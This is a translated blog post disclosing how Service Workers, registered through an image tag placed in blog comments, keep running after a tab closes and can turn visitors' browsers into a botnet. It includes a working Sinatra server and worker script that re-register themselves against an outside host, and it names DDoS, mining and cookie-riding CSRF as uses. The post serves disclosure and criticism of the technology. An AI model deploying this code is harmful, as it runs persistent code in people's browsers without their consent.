Using Service Worker to create a botnet

In short: in this post we will look at one of the many ways to run infinite execution of Javascript code in a browser using the Service Worker, and a little more criticize the technology itself.

An example you will find on this link . Close the tab. After a few minutes, open DevTools / Application / ServiceWorker / Show All. You see, the code continues to work (although now it may already be fixed).

Catworker runs continuously and, like zombies, performs various tasks. That is, you do not need to use a malicious page, any blog with an address is enough. The ability to add third-party images in the comments will allow us to run our code:
')

<img src="https://truefactor.io/cat.gif"> 

Web developers did not expect this: how can an image tag run JS code execution? How can JS run continuously? Is it possible?

Service Worker is too hard

To increase the popularity of "progressive" web applications, the Chrome team created the Service Worker without asking you for permission. In practice, this new “advanced” solution is used only to show a pop-up push notification (Of course, the utility of Service Workers is not limited to this, using them, for example, offline-mode and backsync, - approx. Translator) . If you don’t take my word for it, open your registered Service Worker and study their contents.

Even this will not be so simple: hundreds of lines of code, dependence on FCM, etc. (FCM = Firebase Cloud Messaging, but its use is not obligatory in this case - comment of the translator) . Place sw.js on the server, register the worker on the client side, wait for the Promise to be received, then serviceWorkerRegistration.pushManager.getSubscription (), request the endpoint and registration_id and save them on the server.

So I would implement:

 navigator.pushManager.getSubscription("We will send you weather updates once an hour").then(function(endpoint){ #FCM endpoint }) 

In my humble opinion, Service Worker is a great answer to a non-existent question. Learning to use this solution is much more difficult than Appcache (AppCache, in turn, is considered an outdated technology with its drawbacks - approx. Translator) , moreover, it is less reliable.

How to ensure long-term work

Service Worker turns off 60 seconds after it receives the last event, for example, onmessage, onfetch, onforeignfetch, etc.

1. Send messages to yourself.

 self.addEventListener('message', function (event) {   var spawnNewMessageEvent = function (data) {       return new Promise(function (success) {           setTimeout(function () {               var sw = self.registration.active;               sw.postMessage(data);               success("success");           }, 30000)       });   };   event.waitUntil(doSomething().then(spawnNewMessageEvent)); }); 

1. Two workers send each other ForeignFetch requests. To use ForeignFetch, you will need to get the Origin Trial token - a fully automated process that does not require verification or confirmation and allows the attacker to apply new experimental technologies on real users without their consent.

2. Catworker sends the fetch request to cat.gif, as a result a new worker is registered with a different area of ​​work (this is called registration by reference). The process repeats every 55 seconds.

 require 'sinatra' ot = 'AglMWHYLtMNT8FVZp9u368r0HZPKh7Pjfm7WYEyHwKz4zwaSznv682Bckrz903mz54CVZQACD5ZlSrLpuh8CKQIAAABYeyJvcmlnaW4iOiAiaHR0cHM6Ly90cnVlZmFjdG9yLmlvOjQ0MyIsICJmZWF0dXJlIjogIkZvcmVpZ25GZXRjaCIsICJleHBpcnkiOiAxNDg0OTM2NzI3fQ==' get "/cat.gif" do response.headers['Origin-Trial'] = ot; response.headers['Access-Control-Allow-Origin'] = '*'; response.headers['Link'] = '</sw?'+rand(999999999).to_s+'>; rel="serviceworker"; scope="/'+rand(999999999).to_s+'"' if params[:skip]   'ok' else   response.headers['Content-Type'] = "image/gif"   File.open('./cat.gif').read end end get "/sw" do response.headers['Content-Type'] = "text/javascript" return sw=<<HTML //#{rand(999999999).to_s} setTimeout(function(){ console.log("Forking") fetch('https://truefactor.io/cat.gif?skip=1&'+Math.random(9999999)); }, 30000); HTML end 

How can attackers use it?

Right now, intruders have three options for attacking your browser:

• DDoS (easy to prevent using blacklist).
• Calculations with a large load on memory, for example, mining scrypt / litecoin. You can get only 2000 hash functions per second, but it is absolutely free. In addition, you can use to calculate millions of machines. Check out the other features that the Service Worker offers.
• The most dangerous option is a deferred attack of CSRF. Having discovered a CSRF vulnerability on a website, you can send the task to all your zombies and use their cookies to execute requests on their behalf.

Service Worker processes are persistent in nature. They run after you close the tab, randomly receive synchronization events and start, update every 24 hours, and if you allow the website to send push notifications, they can execute JS code every time the pop-up window is displayed. All this has long been used.
In the future, cybercriminals will have even more ways to bypass the protection so that their code continues to work.

Now this class of errors is not paid enough attention. Tickets are public ( 1 , 2 , 3 ) and receive minimum priority.

Besides all this, the Origin Trial approach is not flawless : anyone can get a token, anyone can use the experimental function for their own purposes. You need the ability to enable and disable the Service Worker as desired.

I am convinced that you need to add a checkbox to disable the Service Worker. Personally, this technology does not benefit me. (Did you read the Cache documentation? It's just like a Chinese document.) New functions come into operation without proper verification, so you can't be sure about the Same Origin Policy and other important security concepts ... Here are some more descriptions of minor security vulnerabilities: FF , JSONP + XSS = takeover , attack of sandboxed domains .